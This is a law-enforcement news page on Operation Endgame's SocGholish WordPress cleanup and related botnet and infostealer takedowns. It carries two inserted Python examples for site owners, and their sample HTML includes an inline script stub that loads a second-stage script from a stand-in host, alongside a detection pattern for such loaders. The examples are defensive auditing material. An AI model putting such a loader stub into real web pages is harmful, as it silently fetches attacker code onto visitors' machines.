  • BCLCC - Brigade Centrale de Lutte Contre la Cybercriminalité
  • National enhed for Særlig Kriminalitet
  • Europol
  • Federal Bureau of Investigation
  • JUNALCO
  • National Crime Agency
  • Office anti-cybercriminalité
  • Openbaar Ministerie
  • Politie
  • FIOD
  • Unité nationale cyber de la Gendarmerie nationale
  • United States Secret Service
  • DCIS
  • Eurojust
  • Bundeskriminalamt
  • Royal Canadian Mounted Police
  • Ottawa Police Service
  • Belgian Federal Police
  • Australian Federal Police

News

Previously in Endgame

International law enforcement initiate hunt on malware group SocGholish

This week, in a major action under Operation Endgame, an international coalition disrupted a key infection chain used by cybercriminals: 14,971 websites infected with SocGholish malware were remediated. SocGholish is used by a criminal group that plays a pivotal role in international cybercrime, namely Evil Corp.

SocGholish uses hacked but otherwise legitimate WordPress sites to spread malware to their visitors, with the aim of gaining unauthorized access to the visitors’ computer systems. WordPress is the world’s most widely used platform for building websites; according to WordPress, more than 43% of all websites on the internet run on it. The login credentials of 1.4 million websites have been leaked, which leaves those sites exposed to malware infection. About 14,971 sites that provide everyday services, such as the websites of restaurants or auto garages, were found to be infected with this malware.
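As an added example (not code from this page, nor from any of the agencies or partners involved), the following Python shows the kind of check a site owner or responder can run on a page served by a WordPress site to spot the way such an injection usually surfaces: a script tag loading from a host the owner does not recognise, or an inline stub that creates a further script element at runtime. The sample HTML, the hostnames and the allowlist are constructed for illustration, and the loader heuristic is generic rather than a SocGholish signature.

```python
"""Flag script loads on a web page that fall outside an owner's allowlist.
Added example: sample HTML, hostnames and the allowlist are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads script from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"example-restaurant.test", "cdnjs.cloudflare.com"}

# Generic heuristic for an inline loader stub: code that creates a <script>
# element or assigns a script src at runtime. Not a malware-family signature.
LOADER_PATTERN = re.compile(
    r"createElement\(\s*['\"]script['\"]\s*\)|\.src\s*=", re.IGNORECASE)
URL_HOST_PATTERN = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed sample page: two expected scripts, one unexpected external
# load, one harmless inline script and one inline stub that pulls a
# further script from the unexpected host at runtime.
SAMPLE_HTML = """<!doctype html><html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.21/lodash.min.js"></script>
<script src="//updates.not-a-real-cdn.test/loader.js"></script>
<script>document.documentElement.className = 'js';</script>
<script>var s=document.createElement('script');s.src='https://updates.not-a-real-cdn.test/stage2.js';document.head.appendChild(s);</script>
</head><body><h1>Menu</h1></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src= on <script> tags
        self.inline = []        # bodies of <script> tags without src=
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands script content over as raw data.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)


def script_host(src, page_host):
    """Host a script src resolves to; relative paths belong to the page host."""
    return (urlparse(src.strip()).hostname or page_host).lower()


def audit_scripts(html, page_host, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return script hosts outside the allowlist and any inline loader stubs."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    hosts = {script_host(src, page_host) for src in collector.external}
    loaders = [body for body in collector.inline if LOADER_PATTERN.search(body)]
    for body in loaders:
        # A loader stub usually names the host it fetches from.
        hosts.update(h.lower() for h in URL_HOST_PATTERN.findall(body))
    unexpected = sorted(hosts - set(allowed) - {page_host.lower()})
    return {"unexpected_hosts": unexpected, "inline_loaders": loaders}


if __name__ == "__main__":
    result = audit_scripts(SAMPLE_HTML, "example-restaurant.test")
    for host in result["unexpected_hosts"]:
        print("unexpected script host:", host)
    print("inline loader stubs to review:", len(result["inline_loaders"]))
```

Run it against a saved copy of the page as served to an ordinary visitor (injected scripts are sometimes only returned to certain browsers or referrers), and compare the allowlist against what the theme and plugins are known to load.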

Maikel Rollman, National High Tech Crime Unit: “With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware. It also reduces the risk that these systems are used for cyber‑attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.”

14,971 websites remediated and disruption of the SocGholish botnet

In the past few days, the Netherlands (NHCTU), Canada (RCMP), the United States (FBI) and Germany (BKA), with support from Europol and Eurojust, delivered a major blow to SocGholish’s criminal infrastructure during a joint action week.

Worldwide, 106 servers and domains were taken down and 14,971 websites were remediated. In addition, the following actions were carried out:

  • Cleaning infected WordPress sites and notifying their owners, urging them to update their sites and change their login credentials.
  • Disabling the SocGholish botnet by taking over domain names and taking servers offline.
  • Notifying owners of WordPress sites whose leaked login credentials were identified by the police, via HaveIBeenPwned, DIVD, Spamhaus, CheckjeHack, NoMoreLeaks, The Shadowserver Foundation and NCSC (Netherlands).

Call to all WordPress website owners

The Dutch police have removed backdoors and malware from the infected WordPress sites. The owners of these sites have been informed. They are urged to:

  • change their login credentials;
  • enable multi‑factor authentication;
  • delete any unknown additional WordPress accounts;
  • keep their WordPress site up‑to‑date in the future.

Do you also have a WordPress website? Prevent yourself from becoming a victim in the future by applying these security steps.
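The steps above can be checked and carried out from the command line with WP-CLI. The following Python is an added example, not code from this page or from the agencies involved: it reads the output of `wp user list --format=json`, flags administrator accounts the owner did not create or that were created recently, and prints the WP-CLI commands for the cleanup. The sample account list, the reference date and the set of known administrators are constructed for illustration.

```python
"""Audit WordPress accounts from `wp user list --format=json` output and
emit WP-CLI remediation commands. Added example: the sample output, the
reference date and the known-administrator list are constructed."""
import json
from datetime import datetime, timedelta

# Administrator logins the owner actually created (assumption for the example).
KNOWN_ADMINS = {"owner"}

# Fixed reference date so the sample below audits the same way every run.
AUDIT_NOW = datetime(2025, 11, 5)

# Constructed sample of `wp user list --format=json` output: the owner's
# account, an editor, and an administrator the owner never created.
SAMPLE_USER_LIST = json.dumps([
    {"ID": 1, "user_login": "owner", "display_name": "Site Owner",
     "user_email": "owner@example-restaurant.test",
     "user_registered": "2019-03-04 10:12:00", "roles": "administrator"},
    {"ID": 7, "user_login": "chef", "display_name": "Chef",
     "user_email": "chef@example-restaurant.test",
     "user_registered": "2021-06-15 08:00:00", "roles": "editor"},
    {"ID": 42, "user_login": "wp-support-adm", "display_name": "wp-support-adm",
     "user_email": "support@mailbox.invalid",
     "user_registered": "2025-10-29 02:14:33", "roles": "administrator"},
])


def audit_users(user_list_json, known_admins=KNOWN_ADMINS, now=None, recent_days=30):
    """Return administrators that are unknown to the owner or newly created,
    keyed by login, with the reasons each one was flagged."""
    now = now or datetime.now()
    findings = {}
    for user in json.loads(user_list_json):
        # WP-CLI joins multiple roles with commas in its JSON output.
        roles = {r.strip() for r in user["roles"].split(",")}
        if "administrator" not in roles:
            continue
        reasons = []
        if user["user_login"] not in known_admins:
            reasons.append("unknown_admin")
        registered = datetime.strptime(user["user_registered"], "%Y-%m-%d %H:%M:%S")
        if now - registered <= timedelta(days=recent_days):
            reasons.append("recent_admin")
        if reasons:
            findings[user["user_login"]] = {"id": user["ID"], "reasons": reasons}
    return findings


def remediation_commands(findings, keep_admin_id):
    """WP-CLI commands for the cleanup: delete unknown administrators
    (reassigning their content to the real owner), set a new password for
    the owner and destroy every live session, invalidate all login cookies
    by rotating the salts, verify core and plugin files against the
    official checksums, then update core, plugins and themes."""
    cmds = []
    for f in findings.values():
        if "unknown_admin" in f["reasons"]:
            cmds.append(f"wp user delete {f['id']} --reassign={keep_admin_id} --yes")
    cmds += [
        # '<new-strong-password>' is a placeholder for a freshly generated password.
        f"wp user update {keep_admin_id} --user_pass='<new-strong-password>'",
        f"wp user session destroy {keep_admin_id} --all",
        "wp config shuffle-salts",
        "wp core verify-checksums",
        "wp plugin verify-checksums --all",
        "wp core update && wp plugin update --all && wp theme update --all",
    ]
    return cmds


if __name__ == "__main__":
    findings = audit_users(SAMPLE_USER_LIST, now=AUDIT_NOW)
    for login, f in findings.items():
        print(f"{login} (ID {f['id']}): {', '.join(f['reasons'])}")
    print("\n".join(remediation_commands(findings, keep_admin_id=1)))
```

Multi-factor authentication is not part of WordPress core, so it does not appear in the command list; it has to be enabled through a plugin or at the hosting provider. The checksum verification matters because backdoors left in core or plugin files survive a password change.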

Prevent your computer from being infected by SocGholish malware

SocGholish is also known as ‘FakeUpdates’. Its malware is distributed via fake software updates, for example for internet browsers. When someone installs such a fake update, the malware opens a connection to the hackers, who then gain access to the computer system. With this so-called initial access, even more dangerous software can then be installed.

Tips to prevent infection:

  • Never trust pop‑ups that appear in your browser.
  • Do not trust updates that are overly flashy and scream for immediate action.
  • Ensure you have an up-to-date virus scanner and leave it enabled during the installation of new software.
  • A genuine update always comes from the official source, for example via your system settings or the app store.

SocGholish malware and Evil Corp

SocGholish has been a constant threat since 2017 and is used to install further malware on victims’ systems, including various ransomware strains that have been used to attack critical infrastructure, resulting in many victims. Distribution is done primarily by hacking websites built with WordPress and injecting malware into them.

SocGholish is linked to the Russian cybercriminal group Evil Corp. This group has previously been responsible for Zeus and Dridex malware and is also associated with several large‑scale ransomware and money‑laundering operations.

End of the game for cybercrime infrastructure: 1025 servers taken down

Between 10 and 13 November 2025, the latest phase of Operation Endgame was coordinated from Europol’s headquarters in The Hague. The actions targeted one of the biggest infostealers, Rhadamanthys, the remote access trojan VenomRAT and the botnet Elysium, all of which played a key role in international cybercrime. Authorities took down these three large cybercrime enablers. The main suspect for VenomRAT was arrested in Greece on 3 November 2025.

The infrastructure dismantled during the action days was responsible for infecting hundreds of thousands of victims worldwide with malware. It consisted of hundreds of thousands of infected computers holding several million stolen credentials. Many of the victims were not aware that their systems were infected. The main suspect behind the infostealer had access to over 100,000 crypto wallets belonging to these victims, potentially worth millions of euros. Check whether your computer has been infected and what to do if so: https://www.politie.nl/checkyourhack and https://haveibeenpwned.com.

Operation ENDGAME strikes again: the ransomware kill chain broken at its source

Cybercriminals around the world have suffered a major disruption after law enforcement and judicial authorities, coordinated by Europol and Eurojust, dismantled key infrastructure behind the malware used to launch ransomware attacks. From 19 to 22 May, authorities took down some 300 servers worldwide, neutralised 650 domains, and issued international arrest warrants against 20 targets, dealing a direct blow to the ransomware kill chain.

In addition, EUR 3.5 million in cryptocurrency was seized during the action week, bringing the total amount seized during Operation Endgame to EUR 21.2 million.

This latest phase of Operation ENDGAME follows on from the largest-ever international action against botnets in May 2024. It targeted new malware variants and successor groups that re-emerged after last year’s takedowns, reinforcing law enforcement’s capacity to adapt and strike back – even as cybercriminals retool and reorganise.

Operation Endgame follow-up leads to five detentions and interrogations as well as server takedowns

In a coordinated series of actions, customers of the Smokeloader pay-per-install botnet, operated by the actor known as ‘Superstar’, faced consequences such as arrests, house searches, arrest warrants or ‘knock and talks’. Superstar used his botnet to run a pay-per-install service, enabling customers to gain access to victims’ machines.

Customers used the service to deploy malware for their own criminal activities. Investigations revealed that botnet access was purchased for a range of purposes, including keylogging, webcam access, ransomware deployment, cryptomining and more. Law enforcement tracked down the customers as they were registered in a database seized during Operation Endgame.

Robust international actions against illicit virtual currency exchanges

Operation Endgame continues to take action to disrupt the cybercriminal ecosystem. In the last week, multiple cryptocurrency exchanges were taken offline by international law enforcement agencies and judicial authorities. These service providers facilitated many different criminal financial flows, such as ransomware payments.

Money laundering facilitates all kinds of serious crime and enables criminals to stay out of reach of investigative authorities. Service providers have an obligation to investigate whether money may have a criminal origin. Knowingly accepting cryptocurrencies derived from crime and thus facilitating money laundering is always punishable by law.

Several botnets dismantled in largest international operation

During a joint action by international law enforcement agencies and judicial authorities, several botnets that played a key role in cybercrime were dismantled. Four arrests were made and sixteen premises were searched worldwide over the past few days. Additionally, eight summonses were served on suspects. Many national and international organisations in the public and private sectors also played an important role in this operation.

The operation enabled us to simultaneously take down these botnets and disrupt the infrastructure used by cybercriminals. Botnets are used for different types of cybercrime, for example ransomware. The dismantled botnets consisted of millions of infected computer systems.

Many of the victims were not aware of the infection of their systems. The estimated financial loss these criminals have caused to companies and government institutions amounts to hundreds of millions of euros.

This large-scale action is called Operation Endgame.

Operation Endgame does not end today. New actions will be announced on this website.

If you have information about the suspects in Operation Endgame, feel free to contact us

Partners

  • IBM X-Force
  • Infoblox
  • Shadowserver
  • Cryptolaemus
  • Team Cymru
  • Prodaft
  • Proofpoint
  • Sekoia
  • Zscaler
  • Abuse.ch
  • Spamhaus
  • Have I Been Pwned
  • Bitdefender
  • Crowdstrike
  • Lumen
  • Spycloud
  • Trellix
  • ESET
  • Microsoft
  • DIVD
  • NCSC